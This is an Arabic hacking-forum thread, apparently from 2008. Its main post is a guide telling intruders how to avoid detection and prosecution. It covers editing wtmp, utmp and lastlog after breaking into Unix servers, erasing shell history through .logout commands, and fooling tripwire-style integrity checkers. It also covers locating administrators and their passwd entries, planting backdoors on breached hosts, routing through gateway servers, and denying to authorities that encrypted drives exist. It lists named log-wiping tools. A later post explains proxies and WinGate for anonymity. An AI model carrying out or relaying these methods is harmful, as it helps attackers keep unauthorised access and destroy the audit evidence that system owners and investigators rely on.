اذا كنت فعلا تريد ان تكون هكر حقيقي ... لابد ان تعرف لمن تقول هذه الحقيقه و كيف تتعامل مع الاخرين .. اعمل حساب انك مراقب دائما و انه هناك كاميرا خفيه وراك دائما .. فاحذر في كلامك على الهاتف لانه قد يكون مراقب .. او حتى بريديك الشخصي و الالكتروني ( لابد ان تعمل حساب الغير المتوقع )

اذا ما قد ذكرته لا يهمك و انك انسان غير مبالي .. دعني اسألك هذه الاسئله ؟
هل تريد ان يراك الاخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر قلوبهم عليك ؟!
هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟
تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه

- و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!
******************************************
بما انك قد استوعبت ماذكر حتى الان و قررت ان تكون انسان حريص جدا .. لابد ان تبقى هكذا طوال الوقت
و تذكر هذه الكلمات : لحظة كسل واحده في اتخاذ الاحتياطات الامنيه قد تغير حياتك باكملها ؟!!!!
دائما تذكر الدافع

- الجزء الثالث :
=========
- تمهيد
******
يجب معرفة هذه الامور القادمه و استيعابها جيدا قبل ممارسة اي عملية اختراق .. حتى لو كنت مخترق متمرس لابد ان تستوعب الافكار القادمه

- امن نفسك :
***********
- ماذا لو قرأ ال SysAdmin رسائلك البريديه الالكترونيه ؟
- ماذا لو كانت اتصالاتك الهاتفيه مسجله و مراقبه من قبل الشرطه ؟
- ماذا لو تم ضبط الكومبيوتر الشخصي و السيطره على كل معلوماتك ؟

اذا كنت لاتقوم بعمل اي اتصالات هاتفيه مع اي شخص من الهاكرز او الكراكرز .. ولا تبعث اي ايميلات فيه معلومات مشبوهه و لا تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه لا يشكل اي خوف لانه ببساطه ايضا انت لست مخترق او hacker =)
لانه لابد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال .. لتبادل الاخبار و الافكار ..
كما انه لابد و انك تمتلك بعض الملفات اللازمه للاختراق او بعض المعلومات الي تعبر مدينه لك في حالة حدوث رصد لجهازك ( كبسه )
<--
-->

قم بتشفير كل ما تملكه من معلومات حساسه sensitive data
يمكنك ذلك باستخدام بعض البرامج الموجوده مجانا على الانترنت .. و هذه قائمه بافضل البرامج و التي تعتبر اختيار الهاكرز الاول :
- لمستخدمين MsDos اليكم SFS v.17 او SecureDrive 1.4b
- لمستخدمين نظام Amiga* اليكم EnigmaII v1.5 ( * احدى انظمة التشغيل غير شائعة الاستخدام خصوصا في عالمنا العربي )
- لمستخدمين انظمة ال Unix اليكم CFS v1.33

لتشفير الملفات بشكل فردي ( ملف بملف ) اليكم هذه البرامج ( الاكثر شهره و الاحسن اداء ) :

- Triple DES
- IDEA
- Blowfish (32 rounds)
- file2file

لتشفير الايميلات :
- PGP v2.6.x

يمكنك ايضا تشفير عملية اتصالك ب Unix System ( على اساس انه ممكن ان تكون مراقب )
و ذلك باستخدام :
- SSH الامن حتى الان
- DES Login
اجعل كلماتك السريه صعبة التخمين .. غير منطقيه .. غير شائعه .. لا توجد في القواميس .. لكن في نفس الوقت لابد ان تتذكرها دائما
اخترها من كتاب تتمتلكه .. اجعلها اكبر عدد ممكن من الاحرف ( يعني عادة عند عمل اي اشتراك يطلب منك كلمه سريه تتكون من 4 -8 احرف ) فاختر ال 8 حروف
لا تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي .. انما يمكنك بان تشفرها ( حتى برموز تفهمها انت فقط ) و اتصل بهم من هواتف الشارع او من العمل ..
اذا انت بالفعل متعمق جدا في الهاكينج فلابد من تشفير كل شئ يتعلق بهذه الامور !!
احفظ دائما نسخه احتياطيه من معلوماتك على CD او HD و بالطبع تكون مشفره حتى اذا خسرت المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه
لاتحتفظ بملفات لاتحتاجها .. و ان كان لديك document files او ملفات مطبوعه و لا تريدها مرة اخرى لاتقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك الاعتياديه او ان اردت الاحتفاظ بها فعليك كتابتها من جديد باسلوب مرمز او مشفر لايعرفه الا انت !!

هل تعرف انه من الممكن ان :
=================
تكون مراقب من : الشرطه , المخابرات , هاكرز اخرون و انهم يتسطيعون رصد كل حركات باستخدام وسائل حديثه لايمكن تخيلها
مثل :
- اجهزه تصوير تستطيع تصويرك عند بعد مئات الامتار
- نقطة ليزر مصوبه نحو غرفتك للتصنت على مكالماتك
- موجات عالية التردد للتنصت على لمسات و صوت يديك على ال keyborad !!
تختلف بالطبع هذه الامكانيات من مكان لاخر و من دوله الى اخرى .. و يرى البعض انه فيما اقوله مبالغه !!! لكن انت لا تعرف ماذا يخبئ لك المستقبل !! فلماذا لاتستعد من الان !!!
كما انه هناك الكثيير من اخواننا العرب في دول الخارج الذي بالفعل تتوفر فيها اجهزة التنصت هذه ... و على راي المثل المصري " امشي عدل يحتار عدوك فيك " فكلما كنت احتياطيا و حركاتك تحسبها بشكل صحيح !!! ففرص اطاحتك قليله جدا



حساباتك و اشتراكات الشخصيه :
===================
هنا سأتكلم عن حساباتك الشخصيه سواء كانت في العمل\المدرسه\الجامعه\اي كان فعليك بالتالي :
- ابدا لا تقوم باي عمل غيير قانوني .. او مشبوه بحسابتك الشخصيه التي فيها يكون اسمك الحقيقي و هويتك و تفصيلات كامله عنك
- عمرك ما تحاول ان تتصل بموقع قد تم اختراقه بواسطة ال telnet
- يمكنك الاشتراك بحسابك الخاص في قائمة البريد لاي موقع امني security من دون خوف ..
- لكن كل مو هو مختص بالهاكينج من ملفات لابد ان تشفر او انها يتم مسحها فورا
- ابدا لا تحفظ اي برامج و ادوات الاختراق على الهارديسك في حسابك الشخصي
- بريدك الحقيقي لاتعطيه الا لمن تثق فيه ثقه عمياء !!!!
- اهتمامك بالسكيورتي لا يجعلك مشبوها .. انما الاهتمام بعكس السكيورتي هو المشكله ==> الهاكينج

<----
ملفات اللوق LoGS :
============
هناك 3 ملفات مهمه جدا :
- WTMP للتسجيل عند الدخول و الخروج ( log on/off - log in/logout + tty + host )
- UTMP للمتواجدين اونلاين حاليا !
- LASTLOG تسجيل من اين جاءت هذه logins

** سنتكلم عنهم باستفاضه و تعمق فيما بعد ( في جزء اخر من نفس الموضوع )

كل عملية دخول بواسطة ال telnet , ftp , rlogin يتم تسجيلها في هذه الملفات .. لابد حذف دخولك من هذه الملفات و الا سيتم معرفة الاتي :
- ماذا قمت بالاختراق !!
- من اي مكان انت قادم
- كم من الوقت بقيت اونلاين ..

خطا يقع فيه الجميع بنسبة 99.9 % مننا ( حتى انا كنت اقع في نفس هذا الخطا زمان .. لكن اتعلمت ) و هو انك تمسح اللوقات logfiles
علطول .. هذا مجدي في حالة انك لاتهتم بان يعرف الادمين انه هناك مخترق ما قد دخل على النظام .. اما اذا اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يلاحظك اي شخص .. دون ان تقوم بتغيير اي شئ يلفت انتباه مدير النظام
و لعمل ذلك تابع معي :
لاتعتمد البرامج التي روجت على انها لاتقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثل برنامج ZAP (or ZAP2
لانه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيلاحظه مدير النظام
اذا عليك بالقيام بذلك يدويا ..
عادة لابد ان تكوت root لتغير و تعدل في ال log files ( باستثناء بعض التوزيعات القديمه جدا )
اماكن تواجد ملفات اللوق default ( تختلف باختلاف التوزيع )
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
و في بعض النسخ القديمه home/.lastlog$

لا تترك اثرا :
=======
كثيير من الهاكرز ينجحون في عملية حذف دخولهم من ملفات اللوق .. لكنهم ينسون امرا هاما و قاتلا !!! و هي الملفات التي توجد هنا
/tmp and $HOME
و جود ال Shell History في HOME$ مصدر قلق كبيير :
History files :
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
Backup Files :
dead.letter, *.bak, *~
لكن الحل موجود ايضا لمسح الHistory files :
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout

- امور و اشياء يجب تجنبها و الحظر منها
======================
لاتقوم ابدا بكسر اي باسورد الا على encrypted partition كما عليك دائما انت تحذر من استخدام اشتراكاتك ( اشتراك الجامعه على سبيل المثال )
لانه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه admin و من ثم سيعرف مالذي تقوم به و الملفات التي تستخدمها الخ ..
حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اسامي مخيفه على الفاضي ..
لاتفكر في نفسك فقط .. يعني حين ان تستخدم بعض الاشتراكات او الshells التي تسمح بالعمل الخلفي background لابد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت الانظار !!!
حاول ان لاتستخدم parametres على قدر المستطاع ... على سبيل المثال اذا اردت ان تتصل من الشيل على تيلنت لموقع معين او سيرفر معين لاتقوم بعمل الاتي : telnet http://www.host.com/ 23 انما ببساطه اتبع الخطوات البطيئه و هي
telnet
open
http://www.host.com/
و هكذا ..
في حالة انك اخترقت سيرفر معين من الافضل ان تضع عليه backdoors مخصصه لنظام التشغيل ( مش sub7 هههههههههه ) و هي كثييره و موجوده مجانا على الانترنت

الجزء الرابع : التقنيات الحديثه الي يتي يجب ملاحظتها
===============================
- تمهيد
*******
بعد ان ثبت اول sniffer و خططت لبدا الاختراقات .. عليك ان تعرف كيف تستخدم هذه التقنيات متعبا ما يلي :
- امنع تقفى اثرك من اي نوع
**********************
قد يلاحظ الادمين ( مدير الشبكه ) وجودك كمخترق hacker و انك اطحت باحد المواقع لكن هذا لايهم ... المهم هو انه كيف سيرصدك و عندها كيف يمكن ان يتعامل معك !!!
لذا ففي هذا الجزء سيتم توضيح كل الاحتمالات و الاساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكن ان تمنعها ...

* من الطبيعي ( العادي ) ان يسهل على مدير الشكبه ( admin ) معرفة النظام الذي كان المخترق عليه عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ( هذا ان كان الهاكر غبي لتركها كما هي ) او من ال output من ال sniffer
او من اوامر netstat في حالة ان المخترق مازال موجودا online
من اجل هذا تختاج ال GateWay Server !!

* A gateway server in between هذا واحد من الكثيير من السيرفرات التي يوجد لك حساب عليها و التي تعتبر في منتهى السخافه في الاستخدام و انت تحتاج لان تكون رووت عليها لتستطيع تغيير ال wtmp and lastlogs
كما انه لابد ان من استخدام اكثر من gateway server و ان تبدل بينهم باستمرار حتى لا يتم الكشف عنك ..
من الشيل الذي ستخترق منه .. قم بالاتصال بال gateway server و من ثم تتصل بالسيرفر المراد اختراقه ..
==> ( تحتاج دائما ل root access لتغيير اللوق )
باستخدامك ل Dialup server يجنبك الكثيير من المشاكل .. حيث انك في غنى عن التعديل في ملفات اللوق بشرط ان تدخل باشتراك مختلف في كل مره تدخل فيها على الhacked system =)
ملحوظه : اذا كنت قادر على الاتصال بسرفيرات dialup كثييره فلا حاجه لان تستخدم hacking server لانه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خلالها

بالنسبه للمتواجدين في الولايات المتحده الامريكيه و اوروبا ( الدول المتقدمه ) حتى و ان قمت بما سبق ( dialup servers ) يمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها !


- ايجاد اي نوع من انواع ملفات اللوق lOGs مهما كان فيها من تلاعب ..
**************************************************

***
من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها .. للحصول و العثور على هذه الملفات يمكن ذلك بهاتين الطريقتين :
1 - اعثر على جميع الملفات المفتوحه : و يمكنك ذلك باستخدام برنامج LSOF هو اختصار List Open Files و من ثم يمكن العثور عليهم و التعديل فيهم
2 - ابحث عن كل الملفات التي تغيرت ( حدث فيها تغيير ) من بعد دخولك -
بعد دخولك قم بعمل touch /tmp/check و بعدها قم "find / -newer /tmp/check -print"
العمليه التي سنقوم بها ستاذخ الشكل التالي : بحث -> نتائج -> مطالعة النتائج -> تعديل
قم ايضا بالتشيك على اماكن ال log files الاعتياديه usr/adm/ و var/adm/ و var/log/
اذا يتم تسجيل العمليات في ال loghost يعني xx@loghost فانت هنا في مازق .. حيث انه لابد من ان تخترق ال loghost لتعدل ملفات اللوق
يمكن تعديل اللوق logfiles بعدة طرق ابسطها باستخدام اي محرر كتابه text editor او قم بعد اسطر الملف باستخدام wc و من ثم حذف اخر 10 اسطر من خلال : "head -LineNumbersMinus10" بالعربي ( عدد السطور مطروحا 10 منه- head )
اذا كان برنامج accouting مثبت على السيرفر يمكنك ببساطه استخدام acct-cleaner from zhart و هو هيعمل اللازم

اذا كان النظام يستخدم wtmpx و utmpx ايضا فمع الاسف عزيز انت في ورطه !!! فانا على اعرف اي برنامج للتعامل في هذه الحاله .. لو استطعت ان تبرمج واحد ( للاخوه المبرمجين ) لا تنسى ان تعلنا به =)

- تحقق من syslog configuration and logfile
************************************
تعتمد معظم البرامج على ال syslog function لتسجيل اي شئ يريدونه .. فعليك ان تتحقق من خصائص الsyslog
فاذا كانت اللوقات logs لاتخزن فقط على الجهاز انما على hosts اخرى ... فيؤسفني انك لابد من اختراق هذه hosts
ملف ال syslog موجود في etc/syslog.conf/

- تحقق من نوعيات برامج الامن المثبته
******************************
توجد العديد من برامج الفحص الأمني غالبا على المواقع ذات الحس الأمني العالي. وتدار هذة البرامج بواسطه أداه تسمى cron و يكون مكانها الأفتراضي أو الطبيعي هو var/spool/cron/crontabs/ و هي تقوم بمتابعه جميع المدخلات . خاصه الـRoot و الملفات التي يستعملها. للتحقق اللسريع من الموضوع نستخدم الأمر التالي
"crontab -l root".
غالبا ماتكون هذه الأدوات محمله و عامله على حساب المدير. و يكون بعضها في مجلد الـ bin/~ الخاص به. كما يمكن ان يكون هناك sinnefer موضوع لأغراض امنيه في نفس المكان.
من الأدوات الت تستعمل في مثل هذه الفحوصات الداخليه
tiger, cops, spi, tripwire, l5,
binaudit, hobgoblin, s3 etc.
ينبغي على المقتحم أن يتأكد من وجود هذه الأدوات و التأكد من التقارير التي ترسلها , للتأكد من أنها لا تكشف عمليه الأقتحام
يمكنك تعديل مفات هذه البرامج للتأكد من أنها لن تقوم بالأبلاغ عن الأقتحام, و يمكن تنفيذ ذلك بطريقتين:
- قم بتعديل البرنامج برمجيا لكي لا يقوم بالأبلاغ عنك (واسعه شويه دي) أو قم بأزالته و أستعمل برنامجا مزيفا
- قد تضطر إلى أزاله الـ back door الذي أستعملته و محاوله تحميله بطريقه أخرى
- تحقق من وجود المدراء Admins
****************************
من المهم أن تجد جميع المدراء على الموقع, و تحاول معرفه الحسابات العاديه التي يتم أستخدامها.
توجد عده طرق لكشف هذه المعلومات:
- قم بفحص الملف .forword و مدخلات الـ alias
-أفحص ملف الـ sulog و حدد المستخدمين الذين نجحو في تنفيذ الأمر su root بنجاح
- أسحب ملف الـ group و أبحث عن جميع المجموعات التي لها علاقه بالأداره ( admin, root, wheel, etc
-أسحب ملف passwd بالنسبه للمدير لعرض كلمات سر المدراء

يعد كل هذا , يمكنك معرفه كل المدراء على الموقع. أدخل إلى مجلداتهم الخاصه ( في حاله عدم أستطاعتك , أستخدم أحدى الأدوات التاليه chid.c, changeid.c لأنتحال شخصيه المستخدم) . و أفحص الملفات التاليهhistory/.sh_history/.bash_history لمعرفه الأوامر التي يستعملونها عادة, قد يفيدك هذا في معرفه دور المدير على الموقع, أو أكتشاف معلومات مخفيه. قم بفحص ملفات .profile/.login/.bash_profile لمراجعه أعدادات الـalias التي تستخدم, و إذا ماكانت أدوات أمنيه خفيه مستخدمه. و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات , خاصه المخفيه منها قد تجد بعض الأشياء المفيده حقا


checksum checking software
************************
برامج checksum ( هو قيمة رقمية تُستعمل للتأكد من خلو البيانات من الأخطاء. هذه القيمة تُحسب من خلال عملية كشف الجمع)

بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات، وفي حالة حدوث اي تغير، يقوم بفحص الملفات ويستطيع اكتشافها
فكيف تعرف مااذا استخدمت هناك برامج التحقق واي الانواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدم من اجلك ؟
هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذا استخدمت مثل تلك البرامج علي الملفات للحماية
هذه اسماء بعض البرامج التي تقوم ب عملية فحص checksum
SOFTWARE : STANDARD PATH : BINARY FILENAMES
tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
binaudit : /usr/local/adm/audit : auditscan
hobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pl
l5 : compile directory : l5

كما تري هناك احتمالات كثيرة، ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر، مثل جزء NTFS لمضيف او جهاز آخر ، او حتي قواعد بيانات التي تحمل معلومات checksum في جهاز محمي علي الكتابة ( اقراص CD مثلا ) ...
ولكن يمكنك القيام بعملية فحص استطلاعي سريع لمعرفة البرامج المستخدمة ، واذا لم تستخدم ففرصتك، واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك الانواع من البرامج هذا يعني ان الموقع او المزود محمي بشكل جيدا ( هارد لك ) ويجب ان لا تعبث بالملفات ابدا ..

ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟
يمكنك 1 - ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات مثلا "tripwire -update /bin/target".

2 - يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فلا يتم فحصها مرة اخري للتحقق ( ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها لا يتم فحصها ب checksum حتي لا يتم اكتشاف التغييرات التي قمت بها )


- حيل المستخدم الامنيه
*******************
هذه الحيل ما ندر توجد او تستخدم لكنني كتبتها فقط لاكون شملت كل شئ ( لكمال الموضوع ) .. فبعض المستخدمين يسمون اشتراكاتهم admins و بالطبع لا يريدون ان يعبث في ملفاتهم اي شخص فيقومون بعمل بعض الحيل في ملفات ال startup لذا فدائما تحقق من .profile, .cshrc, .login, .logout الخ ( اي الملفات التي تبدا بنقطه )



الجزء الخامس :
=========
ماذا تفعل ان وضعت تحت المراقبه؟
***************************
متى اصحبت تحت الميكروسكوب ( المراقبه ) من قبل الشرطه او حتى الadministrators عليك القيام بخطوات هامه و سريعه حتى لايستطيعو الامساك بدليل ( برهان ) عليك

- ملحوظه : ان كان في اعتقاد ال administrators انك hacker فانت ==> مذنب حتى تثبت براته ...
لايعني القانون اي شئ لل admins ( بعض الاوقات اعتقد انه لا يوجد فرق بين ال hacker و ال administrator الا بان مالك الكومبيوتر هو ال administrator فقط ) عندما يعتقدون انك هاكر فانك فورا اصبحت مذنب .. سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف الادمين سيرصدك ايضا هجماتك الاخرى ..
اذا كان يمكنهم مراقبة كل هذه الاتصالات اكيد ببساطه يمكنهم مراقبة خط تيليفونك ..
لذا فعليك عدم القيام باي اتصالات فيها اخبار اخترقاتك .. و ان حتى اردت ان تحذر اصحابك فلا تخبرهم هاتفيا او ببريد الكتروني ( الا اذا كان مشفرا) و من الافضل ان تخبرهم عندما تقابلهم وجها لوجه .. و تمنعهم من راسال اي رسائل غيير عاديه ..
لتؤمن نفسك عليك ان تبقى على هذا الحال على الاقل من شهر الى شهرين .. و الا ستواجه مشاكل اعتقد انك لاترغب بها

الجزء السادس :
=========
ما الذي عليك القيام به و ايضا الذي لابد من عدم القيام به في حالة انه تم القبض عليك:
**************************************************

**************
اولا : اطلب محاميك فورا !!!! : لا تحاول بان تتذكى انت و ترد على التحقيق بمفردك .. فاطلب محاميك كي يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان لا تذكره نهائيا .. بعدها غالبا ما سيطلب المحامي جهازك ( الكومبيوتر ) باقصى سرعه بحجة احتياجه في العمل و الا عليهم تحميل جميع الاعباء الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز .. لذا فانه من العملي جدا ان يكون عندك محامي جاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير
ثانيا : ابدا لا تتكلم الا الشرطه !!! : لاتعطي للشرطه اي معلومات عنك او عن زملائك بحجة ان هذا سيخفف العقاب عنك و سيخرجك من المازق .. لان هذا لن يفيدك بل سيدينك اكثر .. و ان كان يجب استجوابك فاطلب ان يتم هذا فقط من خلال محاميك ( و هذا ايضا حق من حقوقك )
لاتخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه .. انما ايضا بدخول اصحابك في الموضوع ستتسع دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا !
بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك بمنتهى الحريه عدم الافصاح عنها
لكن بعض الدول الاخرى في قانونها انه مادامت وقعت في المصيده لابد ان تدلي لهم بكل شئ في هذه الحاله انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره

الجزء السابع :
========
قائمه بافضل البرامج للتخفي و الاختباء :
******************************
Change - Changes fields of the logfile to anything you want
Delete - Deletes, cuts out the entries you want
Edit - real Editor for the logfile
Overwrite - just Overwrites the entries with zero-value bytes.
Don't use such software (f.e. zap) - it can be detected!
---------------------------------------------------------------
LOG MODIFIER
++++++++++

ah-1_0b.tar Changes the entries of accounting information
clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx
cloak2.c Changes the entries in utmp, wtmp and lastlog
invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so
it's better than zap. Watch out, there are numerous inv*.c !
marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!
wzap.c Deletes entries in wtmp
wtmped.c Deletes entries in wtmp
zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
--------------------------------------------------------------------------------------
الجزء الثامن :
=========
كلمه ختاميه
**********
لاتدعهم ابدا يقبضون عليك .. دائما اجعل عيناك مفتوحان .. اعرف في من تثق و من لا !!
لاتفكر في نفسك فقط (انما ايضا تذكر كل من حولك )
تمنياتي للجميع بحياة ممتعه و امنه ..
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:18   #11
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
" كيف تبقى مجهول الهوية في النت (الجزء الأول)؟؟ "
<منقول من منتدى إعصار>
<الكاتب: المدمر>
في هذا الموضوع سوف أقوم بتعليمكم
ماهو؟
Proxy - Sock Host - Wingate
-(وكيفية استخدامهم للزيادة من صعوبة الكشف عن هويتك في النت)-
مع أدوات بسيطة أيضا تساعدك في التخفي

++++++++++++++++++++++++++++++++++

Introduction to Proxy Server
=(الدخول إلى proxy server أي:خادم الوكيل)=
proxy server (خادم الوكيل) هو خادم server ليقوم أحدا ما بتنزيله على نظامه للإتصال مع المواقع أو أي جهاز على الإنترنت مايفعله أولا هو الاتصال بخادم الوكيل proxy server
لكنه غير إجباري لكن غالبا مايستخدم في الشبكات
مثل:LAN
Local Area Network
شبكة إنترنت محلية عند اتصالك بالإنترنت خلال proxy server جميع اتصالاتك سوف تذهب إلى هذا البروكسي المستخدم أولا وقبل كل شيء ثم تتوزع على الأجهزة التي تريد أن تعمل إتصال بها كمثال
إذا أردت أن تتصل بالإنترنت من خلال استخدام proxy server وتريد أن تتصفح وتفتح موقعا كهذا
http://hackergurus.tk/
عليك أولا بالطلب من هذا proxy server ثم يقوم proxy server بطلب الصفحة
http://hackergurus.tk/
إلى الخادم server الموقع ومن ثم تحميلها وتخزينها في حسابها بعد ذلك سوف تمدك وتعطيك الصفحة أي:تستعرضها...
أليست هذه العملية تأخذ bit بسيط في وقت أطول مقارنة بالإتصال المباشر (العادي) الذي يكلفك فقط بطلب الصفحة من خادم الموقع ومن ثم جاري تحميلها بسهولة واستعراضها
لكن مع استعمالك للبروكسي سيرفر سوف يصبح اتصالك بالإنترنت بطيء مقارنة مع الاتصال المباشر وذلك لأن كل صفحة تقوم بتحميلها أي تستعرضها تذهب إلى خادم البروكسي أي proxey server وهذا يثقل عملية التصفح
وهناك حالة وحدة وقد تصبح lucky بعض الأحيان قل كيف
إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات وانت استخدمت البروكسي الي استخدمه هذا الشخص واستعرضت الصفحة الي استعرضها راح يصبح البروكسي سريع ليه؟!
لأن الشخص الأول الي قام باستخدام البروكسي وعرض الصفحات الصفحة حملت إلى proxy server فما بالك إذا كان لديك نفس البروكسي وحبيت تسعرض نفس الصفحة سوف يكون سريع لأن الصفحة download جاهزة فهمت ..#
وأيضا ياأخواني الوقت مهم مثلا اذا الواحد استعرض صفحة ببروكسي من قبل 10 أيام وانت استخدمت نفس البروكسي واسعرضت نفس الصفحة غير اذا عرضها في يومين لأن proxy server يقدم المواقع الحديثة على القديمة علشان كذا أحيانا تلاحظ تأخر في البروكسيات كل ماعليك عمل &@#&@#&@#&@#&@#&@#&@# أو Reload

Why use a Proxy Server
=(لماذا نستمعل البروكسي سيرفر؟)=
وانا راح اجاوب على الأخوان الي يسئلوني مادام خادم البروكسي يقوم بعملية إبطاء التحميل والتقليل من السرعة إذا مالدافع لاستخدامه ؟!!!
الجواب:هو أن مزودين خدمة الإنترنت
ISP
Internet Service Provider
يقومون بالتحديد وبوضعك في قفص وهو عدم السماح لاستعراض وتحميل الصفحات إلا التي تم الموافقة عليها من قبل مزود الخدمة ويقومون بتقليل المواقع للحفاظ على Traffic الخاص بهم لتوفير السرعة في استخدام البروكسي لمشتركينهم
أما proxy server سوف يجعل لك الحرية الكاملة في استعراض أي موقع مهما كان وسبب آخر للبروكسي وهو للحفاظ أو للزيادة من بقائك مجهولا أثناء قيامك بأي عملية من عمليات الاتصال يعني لو استخدمت بروكسي راح يصعب على خادم الموقع اصطيادك وذلك لأنه يأخذ ip الذي اتصل الموقع من خلاله وهو ip البروكسي وهو الذي يتصل مع خادم الموقع
وأيضا تستطيع الزيادة من صعوبة محاولة الاسقاط بك وذلك باستخدام عدة بروكسيات ذات منافذ مختلفة لكن أعلم أن هذا سوف يقوم بتقليل من سرعة الاتصال لذلك حاول ان تستخدم
proxy و port قريبين إلى منطقتك التي تعيش فيها حتى يكون proxy server قريب وبذلك سوف تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! ..)
تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعلان كأن يقول استخدم
cach.microsoft.com بمنفذ 80
وطبعا انت ماتصدق تلاقي بروكسي بهذي المميزات
1- سريع التصفح
2- يفتح جميع المواقع
3- التحميل عالي جدا وقوي
هل تعرف لماذا ؟
لأن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا
لان هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات Logs

Introduction to Wingate
=(الدخول أو الإدخال إلى Wingate)=
كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟
ماهو WinGate ؟
هو proxy server firewall أي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي على حزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك Anonymously (مجهول الهوية)
التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالات الإنترنت بشركة كمبيوتر بالكامل
اتصال الإنترنت يكون مشارك بواسطة WinGate تقريبا لعدة أنواع تشمل:
-------------------------------------------------------------------------------------------
dial up modem, ISDN, xDSL, cable modem, satellite connection, or even dedicated T1 circuits
-------------------------------------------------------------------------------------------
wingate
متشابه مع البروكسي سيرفر حيث يعمل اتصالات مع كومبيوتر لسيرفر آخر خلال المنفذ 23 , في الحقيقة هو اتصال Telnet .
the wingate سوف يجعل أي شخص على الشبكة دخول الإنترنت أو الاتصال به لمواقع أخرى . بصورة سيئة وفق بين wingate وعدم كفاءة Aminstrator (المدير)
وهنالك العديد من wingate والذي تجعل الأشخاص على الإنترنت للإتصال ببعضهم , بدلا من تحديد المدخل للناس من Local Network (الشبكة المحلية)
وفتح الطريق لأي شيئ من ipspoof في ICQ - Mirc إلى سوء استغلال الحجم .
مثلا wingate قد يطلق عليه open wingates وعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقوم باكتشافه Admin (المدير) وهذا راح يكون DIScover ياأخواني يعني مكشوف أو يتلقى شكاوي من سوء استخدام أو أعضاء غامضين !!!
الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس الاتصال لكن ياأخوان المشاكل تفوق الفوائد
